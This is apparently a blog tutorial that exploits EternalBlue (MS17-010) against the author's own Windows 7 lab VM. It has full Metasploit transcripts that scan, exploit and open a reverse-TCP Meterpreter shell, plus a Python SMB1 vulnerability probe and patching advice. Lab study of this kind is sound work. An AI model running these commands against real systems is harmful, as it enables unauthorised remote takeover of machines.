Breaking into Windows 7 with EternalBlue (MS17-010)

About EternalBlue

A few days ago the WannaCry ransomware was all over everyone's feeds. This worm made people realise how important backing up your files is. Of course, I'm not worried about any virus, because I back up once a day: one copy on Weiyun, one on Nutstore (坚果云), one on an external drive. Even if I get hit, so what, at worst I spend a day reinstalling and configuring the system. Besides, I don't use junk Windows; Linux is immune to everything, and my system gets updated every day. So half the blame for getting hit lies with yourself for having no awareness: it's 2017 and you still keep your files only on your local hard drive, what were you thinking. Mother Fuck
Back on topic: WannaCry spreads using the EternalBlue bug, so as long as you don't expose LAN file sharing, i.e. TCP port 445 is not reachable, it has nothing to hit. (Closing 445 is a mitigation; the actual fix is installing the MS17-010 update, or at least disabling SMBv1, the protocol version EternalBlue abuses.)

On a side note, WannaCry's Chinese localisation, damn, it is really considerate; you could call it the best localised program of 2017. If the studios shipping Steam games did their localisation with the attitude of the people who write malware, would they still fear bad reviews from Chinese players? Not a chance.

Setting up the lab

First install an x64 Windows 7 virtual machine, then enable network sharing step by step as follows.
Open File Explorer -> Network, then


click the bar that says "Network discovery and file sharing are turned off..."


click "Turn on network discovery and file sharing"


click Yes


If it looks like the screenshot above, sharing is on.
Note: the VM's network adapter should preferably be bridged, so that the Kali VM and the Windows 7 VM sit on the same LAN segment and the reverse connection can reach back.
After that you can leave this VM alone; just keep it running.

Exploitation

First update Metasploit:
msfupdate
Note that recent versions of Metasploit print
msfupdate is no longer supported when Metasploit is part of the operating system. Please use 'apt update; apt install metasploit-framework'
That's fine; updating it through the system package manager with apt update && apt install metasploit-framework works just as well.
Next, scan the machines on the LAN.
I like using xerosploit to scan the LAN because it is convenient; if you don't know how to install and use it, see my post:
http://www.bboysoul.cn/2017/07/01/%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB%E5%B7%A5%E5%85%B7(Xerosploit)/
The steps are as follows:

root@kali:~# xerosploit


██╗ ██╗███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗██████╔╝██║ ██║ ██║██║ ██║
██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
██╔╝ ██╗███████╗██║ ██║╚██████╔╝███████║██║ ███████╗╚██████╔╝██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

[ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█ █
█ Your Network Configuration █
█ █
└═════════════════════════════════════════════════════════════════════════════┘

╒═══════════════╤═══════════════════╤═════════════╤═════════╤════════════╕
│ IP Address │ MAC Address │ Gateway │ Iface │ Hostname │
╞═══════════════╪═══════════════════╪═════════════╪═════════╪════════════╡
│ │ │ │ │ │
├───────────────┼───────────────────┼─────────────┼─────────┼────────────┤
│ 192.168.1.106 │ 08:00:27:7B:3D:E7 │ 192.168.1.1 │ eth0 │ kali │
╘═══════════════╧═══════════════════╧═════════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║ ║ XeroSploit is a penetration testing toolkit whose goal is to ║
║ Information ║ perform man in the middle attacks for testing purposes. ║
║ ║ It brings various modules that allow to realise efficient attacks. ║
║ ║ This tool is Powered by Bettercap and Nmap. ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮ scan

[++] Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦════════════════════════════════╗
║ IP Address ║ Mac Address ║ Manufacturer ║
╠═══════════════╬═══════════════════╬════════════════════════════════╣
║ 192.168.1.1 ║ 6C:59:40:EB:2C:E4 ║ (Shenzhen MercuryCommunication ║
║ 192.168.1.100 ║ B8:27:EB:CE:05:C6 ║ (Raspberry PiFoundation) ║
║ 192.168.1.105 ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology) ║
║ 192.168.1.107 ║ 08:00:27:B3:74:87 ║ (Oracle VirtualBoxvirtual ║
║ 192.168.1.106 ║ 08:00:27:7B:3D:E7 ║ (This device) ║
║ ║ ║ ║
╚═══════════════╩═══════════════════╩════════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮ 192.168.1.107

[++] 192.168.1.107 has been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ pscan

┌══════════════════════════════════════════════════════════════┐
█ █
█ Port Scanner █
█ █
█ Find open ports on network computers and retrieve █
█ versions of programs running on the detected ports █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮ run

[++] Please wait ... Scanning ports on 192.168.1.107

[+]═════════[ Port scan result for 192.168.1.107 ]═════════[+]

╔══════════════╦══════════╦═══════╗
║ SERVICE ║ PORT ║ STATE ║
╠══════════════╬══════════╬═══════╣
║ MSRPC ║ 135/TCP ║ OPEN ║
║ NETBIOS-SSN ║ 139/TCP ║ OPEN ║
║ MICROSOFT-DS ║ 445/TCP ║ OPEN ║
║ WSDAPI ║ 5357/TCP ║ OPEN ║
║ ║ ║ ║
╚══════════════╩══════════╩═══════╝

[+] Enter 'run' to execute the 'pscan' command.

Xero»modules»pscan ➮

First, there are five machines on the LAN: the first is my router, the second my Raspberry Pi, the third my main computer, the fourth the Windows 7 VM (192.168.1.107), and the fifth my Kali VM (the one marked "This device").
Port-scanning the Windows 7 VM confirms that 445/TCP is open (along with 135 and 139, the usual RPC/NetBIOS/SMB trio).
Then open Metasploit and attack; the steps are as follows:

root@kali:~# msfconsole


.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .


=[ metasploit v4.14.27-dev ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search ms17-010
[!] Module database cache not built yet, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption


msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.107
rhosts => 192.168.1.107
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.107 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf auxiliary(smb_ms17_010) > run

[+] 192.168.1.107:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(ms17_010_eternalblue) > set payload windows/x64/
set payload windows/x64/exec set payload windows/x64/meterpreter/reverse_winhttps set payload windows/x64/vncinject/bind_ipv6_tcp
set payload windows/x64/loadlibrary set payload windows/x64/powershell_bind_tcp set payload windows/x64/vncinject/bind_ipv6_tcp_uuid
set payload windows/x64/meterpreter/bind_ipv6_tcp set payload windows/x64/powershell_reverse_tcp set payload windows/x64/vncinject/bind_tcp
set payload windows/x64/meterpreter/bind_ipv6_tcp_uuid set payload windows/x64/shell/bind_ipv6_tcp set payload windows/x64/vncinject/bind_tcp_uuid
set payload windows/x64/meterpreter/bind_tcp set payload windows/x64/shell/bind_ipv6_tcp_uuid set payload windows/x64/vncinject/reverse_http
set payload windows/x64/meterpreter/bind_tcp_uuid set payload windows/x64/shell/bind_tcp set payload windows/x64/vncinject/reverse_https
set payload windows/x64/meterpreter/reverse_http set payload windows/x64/shell/bind_tcp_uuid set payload windows/x64/vncinject/reverse_tcp
set payload windows/x64/meterpreter/reverse_https set payload windows/x64/shell/reverse_tcp set payload windows/x64/vncinject/reverse_tcp_uuid
set payload windows/x64/meterpreter/reverse_tcp set payload windows/x64/shell/reverse_tcp_uuid set payload windows/x64/vncinject/reverse_winhttp
set payload windows/x64/meterpreter/reverse_tcp_uuid set payload windows/x64/shell_bind_tcp set payload windows/x64/vncinject/reverse_winhttps
set payload windows/x64/meterpreter/reverse_winhttp set payload windows/x64/shell_reverse_tcp
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.1.107 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.106 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::a00:27ff:fe7b:3de7 prefixlen 64 scopeid 0x20<link>
ether 08:00:27:7b:3d:e7 txqueuelen 1000 (Ethernet)
RX packets 4305 bytes 483899 (472.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11338 bytes 2843116 (2.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 8 bytes 396 (396.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8 bytes 396 (396.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.106
lhost => 192.168.1.106
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 192.168.1.107 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.106 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.106:4444
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.107:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.1.107:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.1.107:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.107
[*] Meterpreter session 1 opened (192.168.1.106:4444 -> 192.168.1.107:49159) at 2017-07-02 04:15:38 -0400
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

First I started Metasploit and searched for anything related to ms17-010; there is one auxiliary (scanner) module and one exploit module. I used the auxiliary module to probe whether this Windows 7 box has the MS17-010 bug, and it printed
[+] 192.168.1.107:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Ultimate 7601 Service Pack 1)
meaning the target is vulnerable. Then I switched to the exploit module, loaded a Meterpreter payload (windows/x64/meterpreter/reverse_tcp), set the target IP (RHOST) and the local IP the reverse-connect payload calls back to (LHOST), ran exploit, and got a session.

Note that in this Metasploit build the exploit module has a single target, "Windows 7 and Server 2008 R2 (x64)", and the payload chosen is an x64 one, so this exact recipe only works against x64 systems; the payload architecture must match the target, and the VerifyArch and VerifyTarget options (both on by default) abort the run if the remote arch or OS does not match. Also, because the exploit corrupts the non-paged kernel pool, a failed attempt can blue-screen the target, so do not run it against anything you cannot afford to reboot.
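The check that the auxiliary module performs above, and the reason the pscan result with 445/TCP open matters, can be reproduced without Metasploit. What follows is an added example written for this write-up, not code from the original post or from Metasploit: a minimal SMB1 client that negotiates, sets up an anonymous session, connects to IPC$ and sends the same PeekNamedPipe-on-FID-0 TRANSACTION that smb_ms17_010 sends, then classifies the NT status that comes back. It assumes the target still speaks SMBv1 and allows an anonymous connection to IPC$ (as the Windows 7 VM above did); the PID/MID values and the NativeOS/NativeLanMan strings are arbitrary choices, and fake_reply exists only to exercise the parser offline. Point it only at machines you own.

```python
"""Minimal SMB1 probe reproducing the MS17-010 check behind
auxiliary/scanner/smb/smb_ms17_010 (added example, not Metasploit code).
Negotiate -> anonymous Session Setup -> Tree Connect IPC$ ->
SMB_COM_TRANSACTION with Setup = [PeekNamedPipe, FID 0].
Unpatched srv.sys answers STATUS_INSUFF_SERVER_RESOURCES; a patched host
answers STATUS_INVALID_HANDLE (or STATUS_ACCESS_DENIED)."""
import socket
import struct

SMB_COM_TRANSACTION = 0x25
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
TRANS_PEEK_NMPIPE = 0x23

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_HANDLE = 0xC0000008            # patched: FID 0 rejected up front
STATUS_ACCESS_DENIED = 0xC0000022             # patched, or anonymous access blocked
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205   # unpatched: the MS17-010 tell


def smb_header(command, tid=0, uid=0, mid=1):
    """32-byte SMB1 header. Flags 0x18 = canonical, case-insensitive paths;
    Flags2 0x4001 = LONG_NAMES | NT_STATUS (no UNICODE bit: strings are ASCII).
    PID 0x1234 is an arbitrary value (assumption)."""
    return struct.pack('<4sBIBHH8sHHHHH', b'\xffSMB', command, 0, 0x18, 0x4001,
                       0, b'\x00' * 8, 0, tid, 0x1234, uid, mid)


def netbios(smb):
    """NetBIOS session service framing: type 0x00 plus 24-bit big-endian length."""
    return b'\x00' + struct.pack('>I', len(smb))[1:] + smb


def build_negotiate():
    dialects = b'\x02NT LM 0.12\x00'            # WordCount 0, ByteCount, one dialect
    return smb_header(SMB_COM_NEGOTIATE) + struct.pack('<BH', 0, len(dialects)) + dialects


def build_session_setup():
    """WordCount-13 (non-extended-security) Session Setup; zero-length passwords
    and an empty account name request an anonymous (null) session."""
    words = struct.pack('<BBHHHHIHHII', 0xff, 0, 0,  # no AndX command
                        0xffdf, 2, 1, 0,             # MaxBufferSize, MaxMpxCount, VcNumber, SessionKey
                        0, 0, 0,                     # OEM pw len, Unicode pw len, Reserved
                        0x50)                        # CAP_NT_SMBS | CAP_STATUS32 -> NT status codes back
    data = b'\x00\x00Unix\x00Samba\x00'              # account, domain, NativeOS, NativeLanMan (arbitrary)
    return (smb_header(SMB_COM_SESSION_SETUP_ANDX) + bytes([13]) + words
            + struct.pack('<H', len(data)) + data)


def build_tree_connect(uid, host):
    """Tree Connect to \\\\host\\IPC$ with a 1-byte empty password, service '?????' (any)."""
    data = b'\x00' + f'\\\\{host}\\IPC$'.encode() + b'\x00' + b'?????\x00'
    words = struct.pack('<BBHHH', 0xff, 0, 0, 0, 1)  # no AndX, Flags 0, PasswordLength 1
    return (smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + bytes([4]) + words
            + struct.pack('<H', len(data)) + data)


def build_peek_probe(uid, tid):
    """SMB_COM_TRANSACTION, Setup = [PeekNamedPipe, FID 0], MaxParam/MaxData 0xffff,
    name '\\PIPE\\': the request the Metasploit checker sends. Offsets are
    relative to the SMB header start (header + WordCount + 16 words + ByteCount + name)."""
    name = b'\\PIPE\\\x00'
    offset = 32 + 1 + 32 + 2 + len(name)
    words = struct.pack('<HHHHBBHIHHHHHBB',
                        0, 0, 0xffff, 0xffff,   # TotalParam, TotalData, MaxParam, MaxData
                        0, 0, 0, 0, 0,          # MaxSetup, Reserved, Flags, Timeout, Reserved
                        0, offset, 0, offset,   # ParamCount/Offset, DataCount/Offset
                        2, 0)                   # SetupCount, Reserved
    setup = struct.pack('<HH', TRANS_PEEK_NMPIPE, 0)
    return (smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + bytes([16]) + words + setup
            + struct.pack('<H', len(name)) + name)


def nt_status(smb):
    return struct.unpack_from('<I', smb, 5)[0]


def smb_tid(smb):
    return struct.unpack_from('<H', smb, 24)[0]


def smb_uid(smb):
    return struct.unpack_from('<H', smb, 28)[0]


def fake_reply(status, tid=0, uid=0):
    """Constructed server-side header with a chosen status, for offline testing only."""
    return struct.pack('<4sBIBHH8sHHHHH', b'\xffSMB', SMB_COM_TRANSACTION, status, 0x98,
                       0xC801, 0, b'\x00' * 8, 0, tid, 0x1234, uid, 1)


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return 'VULNERABLE'
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return 'PATCHED'
    return f'UNKNOWN (0x{status:08X})'


def _recv_exact(sock, n):
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('target closed the connection')
        buf += chunk
    return buf


def exchange(sock, smb):
    """Send one framed SMB and return the reply's SMB bytes (NetBIOS header stripped)."""
    sock.sendall(netbios(smb))
    length = struct.unpack('>I', b'\x00' + _recv_exact(sock, 4)[1:])[0]
    return _recv_exact(sock, length)


def check_ms17_010(host, port=445, timeout=5.0):
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            if nt_status(exchange(sock, build_negotiate())) != STATUS_SUCCESS:
                return 'UNKNOWN (SMB1 negotiate failed; SMBv1 may be disabled)'
            reply = exchange(sock, build_session_setup())
            if nt_status(reply) != STATUS_SUCCESS:
                return 'UNKNOWN (anonymous session refused)'
            uid = smb_uid(reply)
            reply = exchange(sock, build_tree_connect(uid, host))
            if nt_status(reply) != STATUS_SUCCESS:
                return 'UNKNOWN (IPC$ tree connect refused)'
            return classify(nt_status(exchange(sock, build_peek_probe(uid, smb_tid(reply)))))
    except OSError as exc:
        return f'UNKNOWN ({exc})'


if __name__ == '__main__':
    import sys
    print(check_ms17_010(sys.argv[1]))   # e.g. python3 ms17_010_check.py 192.168.1.107
```

Against an unpatched Windows 7 this should print VULNERABLE, which is the same condition behind the module's "Host is likely VULNERABLE" line; a patched host prints PATCHED. A host with SMBv1 disabled never gets past negotiate and prints UNKNOWN, which is exactly the mitigation mentioned in the introduction: no SMBv1 on 445, no EternalBlue.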

Have fun
